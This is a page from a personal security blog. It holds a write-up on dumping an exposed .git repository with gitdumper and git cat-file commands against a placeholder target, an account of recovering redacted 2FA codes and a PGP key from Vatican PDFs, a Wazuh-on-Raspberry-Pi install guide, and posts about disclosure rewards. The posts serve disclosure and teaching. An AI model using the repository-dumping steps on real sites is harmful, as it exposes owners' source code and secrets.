Blog

  • Source code disclosure via exposed .git

    5.00 of 92 votes

    This is my write-up on a misconfigured .git repo I found during my day off and how the potential exploitation of this vulnerability can amount to source-code disclosure. During my day off I took a brief look at a particular vendor my employer was in the process of procuring a new service from. I quickly identified what appeared to be an exposed .git repo which I was able to provisionally validate over HTTP. Whilst I wasn't able to view the .git folder itself because public read access is disabled on the server, I was able to confirm the repository contents were accessible. Example #1:https://[TARGET]/.git/config Example #2:https://[TARGET]/.git/logs/HEAD Here I will walkthrough how we can extract the contents of a repository like this to help identify the impact of a vulnerability such as source code disclosure with a clear PoC. To dump this repository locally for analysis and to help quantify the number of objects within it, we can use the dumper tool from GitTools. git clone https://github.com/internetwache/GitTools.git cd GitTools/Dumper ./gitdumper.sh https://[TARGET]/.git/ ~/target To view a summary of the file tree: cd target tree -a .git/objects The files within the repository are identified by their corresponding hash values, though the full hash string for these actually includes the first two characters of each corresponding subfolder within the tree. This means we need to add these to the file name to complete the 40 character hash string. We can pull these 40 character hashes by concatenating the subfolder name with the filename by using find and then piping the results into the format we want using awk find .git/objects -type f | awk -F/ '{print $3$4}' We can use a for loop to identify the type of all files within the objects directory: for i in $(find .git/objects -type f | awk -F/ '{print $3$4}'); git cat-file -t $i Here we can see these objects consist of a number of trees, commits, and blobs (binary large objects). In this example, I actually have a calculated total of: 1,276 trees 910 commits 923 blobs By default, git stores objects in .git/objects as their original contents, which are compressed using the zlib library. This means we cannot view objects within a text-editor as-is, and must instead rely on alternative options such as git cat-file We can check the type for each of these files individually using their identified hashes: git cat-file -t [FULL FILE HASH] We can preview the contents of each of these files individually using their identified hashes: git cat-file -p [FULL FILE HASH] | head In my last example, we can see this particular blob contains PHP code. As PHP is a server-side scripting language (almost like a blueprint to backend functionality), this can be used to evidence that server-side source code is exposed within this repository. The impact of this can vary depending on the functionality purpose and volume of code, but in my experience often results in the exposure of backend configuration settings, hardcoded credentials (such as usernames and passwords), API tokens, and other endpoints. If this is a repository upon which any proprietary software components rely, then source code disclosure of this type can also present a number of issues relating to theft of intellectual property. This finding was duly reported to the affected vendor within 24 hours of being identified.

  • My limited edition print art collection

    4.94 of 108 votes

    Over the years I've collected a number of prints from a particular artist. This artist is David Ambarzumjan, an incredibly talented painter from Germany that aims to combine abstract and surrealistic elements to express his fascination for nature in all its diversity and unpredictability. His works can be found in private collections and exhibitions all around the world, some of which I've been lucky enough to acquire for decorative placements throughout my home. Here I've documented some of the limited edition prints I've acquired from his Brushstrokes in Time collection and any I'm still interested in buying. I'll endeavour to update this blog post whenever I'm successful in my efforts. THIS WAS WATER(1/100) ZEBRA CROSSING(15/50) SHARKS IN MONTMARTE(6/50) WATERSHED(6/100) STRAY(8/50) HUMAN NATUREOPEN EDITION RECOVEROPEN EDITION BREATHE**SEEKING** GEZEITENWELLE(97/100) If you have any of these limited edition prints which I've listed as **SEEKING** that you would be willing to sell, please feel free to reach out to me via my contact form with offers.

  • How to install a Wazuh SIEM server on a Raspberry Pi 4B

    4.81 of 109 votes

    With many security professionals now working remotely from home, some are looking at ways in which they can improve their home environment network and endpoint security. Commercial SIEM solutions are often considered too costly and complicated to deploy, but free lightweight open-source solutions offering minimal overhead such as Wazuh provide a good compromise for those of modest means aiming to mature the security of their home or small business environment.This is my walkthrough on how to install the Wazuh server manager onto a Raspberry Pi 4B as an all-in-one deployment. I noticed there was no clear guidance online on how to go about doing this for a Raspberry Pi 4B, only a significant number of online posts outlining the installation and deployment difficulties people have faced. So here I've decided to document the process I took, tested and validated from start to finish, with clear directions anyone can follow.By following this guide you can run your own open-source SIEM solution on a Raspberry Pi 4B at home. This is great not only for existing security professionals looking to improve the resiliency of their home setup, but also for those new to the information security industry seeking to gain hands-on experience in SIEM deployment, management, and other SIEM/SOC related activities. Getting started To get started, I used a Raspberry Pi 4B with 8GB RAM and a 128GB SanDisk Extreme SD card for storage. Whilst the Raspberry Pi 4B I used for this project was custom built from TurboPi with high-end hardware for this particular purpose, any Raspberry Pi 4B with adequate hardware capable of running Raspbian OS (buster or greater) leveraging the AArch64 64-bit extension of the ARM architecture should be sufficient. Walkthrough Install a Raspberry Pi 64-bit ARM OS First download and install the official Raspberry Pi Imager. Now download the latest Raspi OS ARM64 .zip image from the official repo (make sure it's the latest version). Open the Raspberry Pi Imager application. Select the CHOOSE OS button and in the dropdown list select the Use custom option. Select the Raspi OS ARM64 .zip file you just downloaded. Select the SD storage card to write this to. Proceed with the prompted erasure, formatting, and writing activities to install the OS to your SD card. The last step here is to write an empty text file named 'ssh' (no file extension) to the root of the directory of the SD card. When the device boots and sees the 'ssh' file present, it will automatically enable SSH, which will allow us to remotely access the device command line in a headless state. Identify your Raspberry Pi local IP address For this I use a Kali VM in VirtualBox, but any flavour of Linux distro can acheive the same. As the guest VM is not visible to the host under the default VirtualBox NAT settings, you need to change your VM network settings to bridge the network adapter between your host machine and the guest VM. Once the network adapter is bridged, we need to identify the Raspberry Pi IP address on the network. There are a few ways to do this (such as logging directly into the router), but we can also use an arp command with the -na flag to display the local network address translation tables and pipe the output using grep to pull any MAC addresses that begin with identifiers we're interested in.arp -na | grep -i dc:a6:32 Raspberry Pi MAC addresses always use the same OUI (Organizational Unique Identifier) in their MAC address (b8:27:eb for all Raspberry Pi devices except Raspberry Pi 4B which uses dc:a6:32). Connecting to the Raspberry Pi Now we have the device IP address (in this example mine is assigned 192.168.1.93), we can SSH into it using default credentials ssh pi@192.168.1.93 with the default password raspberry and get started. Change hostname and update First you may wish to change the hostname from raspberry to wazuh (or something else). To do this run the command sudo raspi-config and navigate to System Options > Hostname using the GUI.Type in your desired hostname and hit Enter, then return to the main menu of the GUI and select Update. Once the device has finished updating, navigate to the to Finish button to save your new raspi-config settings.For the hostname change to take effect, reboot the device using the command sudo reboot, then SSH back in using the same credentials ssh pi@192.168.1.93 with the default password raspberry once the reboot is complete. Enable login as root Then if you want to login as root using SSH or WinSCP you need to edit the config of SSHD. Login, and edit the sshd_config file using sudo nano /etc/ssh/sshd_configFind the line containing PermitRootLogin prohibit-passwordEdit this to reflect PermitRootLogin yes Close and save the file, then reboot or restart sshd service using /etc/init.d/ssh restartSet a root password if there isn't one already using sudo passwd rootNow you can login as root (I recommend using a strong password or SSH keys). Now proceed to sudo up using sudo su and continue the next steps as root. Update the Raspberry Pi packages To update the Raspberry Pi, first ensure the VM you're connecting from over SSH into has an Internet connection and then run the command apt update && apt upgrade -y Once the update and upgrade process is complete, pull down the required packages for the next steps using:apt-get install apt-transport-https zip unzip curl gnupg wget libcap2-bin software-properties-common lsb-release -y Install Java 11 echo 'deb http://deb.debian.org/debian stretch-backports main' > /etc/apt/sources.list.d/backports.list apt update -y apt install openjdk-11-jdk -y Install Elasticsearch OSS Fetch the Elasticsearch OSS arm64 installation package:wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-oss-7.10.2-arm64.deb Install the Elasticsearch OSS package:dpkg -i elasticsearch-oss-7.10.2-arm64.deb Install Open Distro for Elasticsearch Download and add the signing keys for the repositories:wget -qO - https://d3g5vo6xdbdb9a.cloudfront.net/GPG-KEY-opendistroforelasticsearch | sudo apt-key add - wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add - Add the repository definitions:echo "deb https://d3g5vo6xdbdb9a.cloudfront.net/apt stable main" | sudo tee -a /etc/apt/sources.list.d/opendistroforelasticsearch.list Update the packages:apt-get update -y Install the Open Distro for Elasticsearch package:apt install opendistroforelasticsearch -y Configure and run Elasticsearch Run the following command to download the configuration file /etc/elasticsearch/elasticsearch.yml:curl -so /etc/elasticsearch/elasticsearch.yml https://packages.wazuh.com/resources/4.2/open-distro/elasticsearch/7.x/elasticsearch_all_in_one.yml Now we need to add users and roles in order to use the Wazuh Kibana properly. Run the following commands to add the Wazuh users and additional roles in Kibana:curl -so /usr/share/elasticsearch/plugins/opendistro_security/securityconfig/roles.yml https://packages.wazuh.com/resources/4.2/open-distro/elasticsearch/roles/roles.ymlcurl -so /usr/share/elasticsearch/plugins/opendistro_security/securityconfig/roles_mapping.yml https://packages.wazuh.com/resources/4.2/open-distro/elasticsearch/roles/roles_mapping.ymlcurl -so /usr/share/elasticsearch/plugins/opendistro_security/securityconfig/internal_users.yml https://packages.wazuh.com/resources/4.2/open-distro/elasticsearch/roles/internal_users.yml Remove the demo certificates:rm /etc/elasticsearch/esnode-key.pem /etc/elasticsearch/esnode.pem /etc/elasticsearch/kirk-key.pem /etc/elasticsearch/kirk.pem /etc/elasticsearch/root-ca.pem -f Download the wazuh-cert-tool.sh:curl -so ~/wazuh-cert-tool.sh https://packages.wazuh.com/resources/4.2/open-distro/tools/certificate-utility/wazuh-cert-tool.shcurl -so ~/instances.yml https://packages.wazuh.com/resources/4.2/open-distro/tools/certificate-utility/instances_aio.yml Run the wazuh-cert-tool.sh to generate the certificates:bash ~/wazuh-cert-tool.sh Move the Elasticsearch certificates to their corresponding location for deployment:mkdir /etc/elasticsearch/certs/mv ~/certs/elasticsearch* /etc/elasticsearch/certs/mv ~/certs/admin* /etc/elasticsearch/certs/cp ~/certs/root-ca* /etc/elasticsearch/certs/ Enable and start the Elasticsearch service:systemctl daemon-reloadsystemctl enable elasticsearchsystemctl start elasticsearch Run the Elasticsearch securityadmin script to load the new certificates information and start the cluster:export ES_JAVA_HOME=/usr/share/elasticsearch/jdk/ && /usr/share/elasticsearch/plugins/opendistro_security/tools/securityadmin.sh -cd /usr/share/elasticsearch/plugins/opendistro_security/securityconfig/ -nhnv -cacert /etc/elasticsearch/certs/root-ca.pem -cert /etc/elasticsearch/certs/admin.pem -key /etc/elasticsearch/certs/admin-key.pem Run the following command to ensure the installation is successful:curl -XGET https://localhost:9200 -u admin:admin -k An example response should look as follows: The Open Distro for Elasticsearch performance analyzer plugin is installed by default and can have a negative impact on system resources. The official Wazuh documentation recommends removing this with the following command /usr/share/elasticsearch/bin/elasticsearch-plugin remove opendistro-performance-analyzer and restarting the Elasticsearch service afterwards. Install and run the Wazuh manager Install the GPG key:curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | apt-key add - Add the repository definition:echo "deb https://packages.wazuh.com/4.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list Update the Wazuh packages:apt-get update -y Install the Wazuh manager package:apt-get install wazuh-manager Enable and start the Wazuh manager service:systemctl daemon-reloadsystemctl enable wazuh-managersystemctl start wazuh-manager Run the following command to check if the Wazuh manager is active:systemctl status wazuh-manager An example response should look as follows: Install and configure Filebeat Add the repository definition:echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list Fetch the Filebeat arm64 installation package:wget https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-oss-7.12.1-arm64.deb Install the Filebeat package:dpkg -i filebeat-oss-7.12.1-arm64.deb Download the pre-configured Filebeat config file used to forward Wazuh alerts to Elasticsearch:curl -so /etc/filebeat/filebeat.yml https://packages.wazuh.com/resources/4.2/open-distro/filebeat/7.x/filebeat_all_in_one.yml Download the alerts template for Elasticsearch:curl -so /etc/filebeat/wazuh-template.json https://raw.githubusercontent.com/wazuh/wazuh/4.2/extensions/elasticsearch/7.x/wazuh-template.jsonchmod go+r /etc/filebeat/wazuh-template.json Download the Wazuh module for Filebeat:curl -s https://packages.wazuh.com/4.x/filebeat/wazuh-filebeat-0.1.tar.gz | tar -xvz -C /usr/share/filebeat/module Copy the Elasticsearch certificates into /etc/filebeat/certs:mkdir /etc/filebeat/certscp ~/certs/root-ca.pem /etc/filebeat/certs/mv ~/certs/filebeat* /etc/filebeat/certs/ Enable and start the Filebeat service:systemctl daemon-reloadsystemctl enable filebeatsystemctl start filebeat To ensure that Filebeat has been successfully installed, run the following command:filebeat test output An example response should look as follows: Install and configure Kibana Install the Kibana package:apt-get install opendistroforelasticsearch-kibana Download the Kibana configuration file:curl -so /etc/kibana/kibana.yml https://packages.wazuh.com/resources/4.2/open-distro/kibana/7.x/kibana_all_in_one.yml Create the /usr/share/kibana/data directory:mkdir /usr/share/kibana/datachown -R kibana:kibana /usr/share/kibana Install the Wazuh Kibana plugin. The installation of the plugin must be done from the Kibana home directory as follows:cd /usr/share/kibanasudo -u kibana /usr/share/kibana/bin/kibana-plugin install https://packages.wazuh.com/4.x/ui/kibana/wazuh_kibana-4.2.5_7.10.2-1.zip Copy the Elasticsearch certificates into the Kibana configuration folder:mkdir /etc/kibana/certscp ~/certs/root-ca.pem /etc/kibana/certs/mv ~/certs/kibana* /etc/kibana/certs/chown kibana:kibana /etc/kibana/certs/* Link Kibana’s socket to privileged port 443:setcap 'cap_net_bind_service=+ep' /usr/share/kibana/node/bin/node Enable and start the Kibana service:systemctl daemon-reloadsystemctl enable kibanasystemctl start kibana Check the Kibana service status to ensure it's running:systemctl status kibana An example response should look as follows: Open the Kibana interface Visit the Raspberry Pi 4B device IP address in your browser (e.g my interface is reachable at https://192.168.1.93). Upon the first access to Kibana, the browser shows a warning message stating that the certificate was not issued by a trusted authority. An exception can be added in the advanced options of the web browser or, for increased security, the root-ca.pem file previously generated can be imported to the certificate manager of the browser. Alternatively, a certificate from a trusted authority can be configured. Login to Kibana using the default user credentials admin with the password admin. For security purposes I recommend these credentials are changed. Change the default passwords To change the default credentials for all users residing in the internal_users.yml file, run the following command:bash wazuh-passwords-tool.sh -a An example response should look as follows: Remember to take note of these credentials or save them into a password manager if you have one. Next we need to also also update the credentials for Filebeat and Kibana (if these were not already covered by the wazuh-passwords-tool.sh script). Open and update the Filebeat configuration file:nano /etc/filebeat/filebeat.yml Change the associated password: value. Make sure you make a record of this, then save and exit. Open and update the Kibana configuration file:nano /etc/kibana/kibana.yml Change the associated elasticsearch.password: value. Make sure you make a record of this, then save and exit. Restart all services for the changes to take effect:systemctl restart wazuh-managersystemctl restart filebeatsystemctl restart kibana Congratulations, you've now installed the Wazuh server manager onto your Raspberry Pi. Now you can install the Wazuh agents on any devices you want to onboard to monitor security related events from within the server manager interface. The Wazuh agent installation guide is relatively simple and can be found here. I hope this tutorial helped.

  • I hacked the Ministry of Defence so they sent me this coin

    • General
    • by Jacob Riggs
    • 28-09-2021
    4.92 of 129 votes

    The UK Ministry of Defence (MoD) sent me a VDP challenge coin for my finding and responsible disclosure of a critical (9.6 CVSS) severity vulnerability. Together with the coin was a small thank you note.Thank you! The Ministry of Defence takes the security of our systems seriously. To show our appreciation for all your time and effort, we would like to reward you with a Vulnerability Disclosure hacker coin. This echos a similar response to when I hacked the Dutch government and they sent me a t-shirt.

  • How I stumbled over a vulnerability in the Vatican

    4.98 of 121 votes

    This is my write-up and walkthrough for a simple low-complexity but potentially high-impact vulnerability I identified within files hosted on the Vatican web app. This started as me looking for a domain to set up a dedicated BIND9 service on a new DNS server I was building. I was looking for a domain, and for reasons I won't go into here, wanted one for a particular use-case that leveraged the .va top-level domain (TLD). However, I quickly encountered a problem... I couldn't register a .va domain Different countries each have their own country code TLD. Generally, most countries allow for individuals outside of their citizenry to still register domains using their country code TLD. However, the .va TLD is reserved for the State of the Vatican City, is administered by the Internet Office of the Holy See (the Pope), and registrations are not permitted to those outside of the Vatican's administration. Having learned this from a few Google searches, and not knowing much about the Vatican, I decided to do some further research to see if there was any legitimate way around this. Perhaps an application form I could fill out? A higher fee I could pay? Maybe a contact number for the Pope so I could seek his blessing? I looked around the Vatican's official website located at https://vatican.va for some support. In doing so, I stumbled across the https://supportoposta.vatican.va subdomain, which seemed to point to a directory hosting internal user guides in PDF format for webmail configuration. Not exactly what I was looking for, but I was curious why this was publicly accessible. Internal user guides, whilst not always sensitive, can often allow attackers during their recon to learn a lot about the tools and technologies upon which a target organisation relies. I decided to check what information these configuration files contained. Two example pages are included below: Everything was in Italian. I can’t read Italian, and for obvious reasons was reluctant to start uploading text I couldn't understand from internal Vatican government files into a cloud US-based translator (such as Google Translate). Fortunately, the screenshot images were clear and having a background in IT meant I was already familiar with much of the mail-client configuration steps the documentation outlined. But something stood out to me - the blue-box redactions within the screenshots provided seemed too familiar. Why? Because I know these as the same blue boxes MS Word defaults to when selecting to insert rectangular shapes within MS Word documents. This tells me the PDF files hosted on the site were originally created in MS Word and likely exported from MS Word into PDF format. Why is this important? Because exporting MS Word documents to PDF doesn't flatten embedded content layers. Redacting an MS Word document The key to understanding how sensitive data can be embedded in a PDF document is that information hidden or covered in an electronic document, can easily be recovered. The solution is to ensure that sensitive information is not just visually hidden or made illegible, but is actually deleted from the source file. In some documents, deleting sections can cause an undesirable reflow of text and graphics. If document formatting is a critical issue, this document provides some methods for maintaining that formatting. I checked if the redaction layers were removable by simply copying the embedded content back into an MS Word document, then selecting those layers and deleting them. It worked. But there were multiple PDF files with many redactions that I couldn’t translate, so to speed things up I did what I thought cyber Jesus would do. I downloaded everything, used a local OCR (Optical Character Recognition) software to extract all text data from the files, and parsed their output through a translator to generate new editable documents in English. After removing the redactions and reviewing all the user guides properly in English, I identified three to be of potential value to an attacker. Whilst these files are unredacted copies of their originals, I opted to manually blur out any residual data I felt could enable an adversary to identify data subjects. Zimba MFA Config Shared Calendar Config Mail Encryption Config As can be seen within the partially redacted versions of these documents (I manually removed all PII), they expose: 2FA backup code allowing an attacker to generate valid one-time 2FA codes 1024 bit PGP private key PGP private key passphrase for decryption and message signing Internal directory paths for CalDAV configuration Internal email communications Internal calendar schedules Names and email addresses of internal staff   Conclusion I feel it worth noting that this type of oversight, which can amount to sensitive data exposure, remains as prevalent today as it was over a decade ago. Redaction failure episodes are still commonly reported in the media, and this highlights the ongoing tech challenges associated with what traditionally only required a black pen and paper. The key take-away from this, albeit an obvious one, is that humans are naturally fallible and we all make mistakes. The document publisher, where potentially identified, should not be the subject of focus, but rather the adopted redaction practice and process itself. I hope that by documenting this report here it might help raise awareness of this issue and prevent others from making the same mistake in the future. Repeat attempts were made to contact the Vatican regarding this report over the course of three months. They were also served adequate prior notice of this write-up. I will update this blog post should I receive a response.

  • I hacked the Dutch government and all I got was this t-shirt

    • General
    • by Jacob Riggs
    • 04-05-2021
    4.99 of 137 votes

    The NCSC-NL (National Cyber Security Centre – Netherlands) sent me a ‘lousy’ t-shirt on behalf of the Dutch government. Together with the t-shirt was a thank you letter.Thank you for bringing a vulnerability to our attention. Together with vulnerability reporters like you we can increase the resilience of Dutch society in the digital domain and better protect our systems and systems of our partners. This was a pleasant response to receive and illustrates a far better approach to engaging with ethical hackers than traditional threats of prosecution. However, there’s been some past controversy within the security community on whether this type of reward disincentivises ethical hacker participation by undermining the value inherent in VDP and bug bounty programs. Some argue that the effort researchers need to invest in helping to find and responsibly report vulnerabilities to government organisations far outweighs the level of compensation value these novelty rewards are worth. My view is that expectations should be managed realistically, and maybe the focus should shift away from pursuing personal gain to instead encouraging wider public sector adoption of better security practices. I’m happy with my t-shirt and appreciate the efforts the NCSC-NL went to. It’s certainly a better response than some of the other governments I’ve reported vulnerabilities to.